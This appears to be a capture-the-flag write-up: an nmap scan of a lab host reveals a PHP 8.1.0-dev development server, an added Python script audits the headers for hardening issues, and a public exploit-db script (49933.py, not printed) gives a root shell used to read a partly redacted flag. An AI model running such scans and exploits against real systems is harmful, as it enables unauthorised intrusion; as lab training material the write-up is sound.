Nmap

First we scan for open ports:

# nmap -p- -T4 -sV -sC 10.10.254.40 -oA nmap
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-06 14:39 BST
Nmap scan report for 10.10.254.40
Host is up (0.021s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    PHP cli server 5.5 or later (PHP 8.1.0-dev)
|_http-title:  Admin Dashboard

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.24 seconds

Website

When visiting the site, the headers revealed the site was running on PHP 8.1.0-dev. This is also shown in the nmap output.

HTTP/1.1 200 OK
Host: 10.10.254.40
Date: Wed, 06 Aug 2025 13:48:44 GMT
Connection: close
X-Powered-By: PHP/8.1.0-dev
Content-type: text/html; charset=UTF-8
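
Added example, not part of the original write-up: a small Python audit that takes the two fingerprints seen so far (the X-Powered-By header and the nmap service line) and reports what a defender should fix. The sample inputs are constructed from the output on this page, and the function names are hypothetical.

```python
import re

# Constructed sample inputs, modelled on the output shown on this page.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Host: 10.10.254.40\r\n"
    "Connection: close\r\n"
    "X-Powered-By: PHP/8.1.0-dev\r\n"
    "Content-type: text/html; charset=UTF-8\r\n"
    "\r\n"
)
SAMPLE_NMAP_LINE = "80/tcp open  http    PHP cli server 5.5 or later (PHP 8.1.0-dev)"

# Version number plus an optional pre-release suffix (-dev, alpha, beta, RC).
PHP_VERSION = re.compile(
    r"PHP[/ ](\d+\.\d+\.\d+)(-?(?:dev|alpha\d*|beta\d*|RC\d*))?", re.I)

def parse_headers(raw):
    """Return the response headers as a dict with lower-cased names."""
    headers = {}
    for line in raw.splitlines()[1:]:      # skip the status line
        if not line.strip():               # blank line ends the header block
            break
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers

def audit(raw_response="", nmap_line=""):
    """Return a list of hardening findings for one HTTP service."""
    findings = []
    powered = parse_headers(raw_response).get("x-powered-by", "")
    if powered:
        findings.append(f"version disclosed in X-Powered-By: {powered}")
    for source in (powered, nmap_line):
        m = PHP_VERSION.search(source)
        if m and m.group(2):
            note = f"pre-release PHP build in use: {m.group(1)}{m.group(2)}"
            if note not in findings:
                findings.append(note)
    # PHP's built-in server is meant for development, not public networks.
    if "php cli server" in nmap_line.lower():
        findings.append("PHP built-in development server exposed on the network")
    return findings

if __name__ == "__main__":
    for finding in audit(SAMPLE_RESPONSE, SAMPLE_NMAP_LINE):
        print("[!]", finding)
```

Setting expose_php = Off in php.ini removes the X-Powered-By header, but the underlying fix is to run a release build behind a production web server.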

Looking on exploit-db we find there is an exploit for this that will get a shell. So we run the exploit, get a root shell and can grab the flag.

# python 49933.py                                              
Enter the full host url:
http://10.10.254.40

Interactive shell is opened on http://10.10.254.40 
Can't acces tty; job crontol turned off.
$ id
uid=0(root) gid=0(root) groups=0(root)

$ ls /
bin
boot
dev
etc
flag.txt
home
lib
lib64
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var

$ cat /flag.txt
flag{41****************************cb}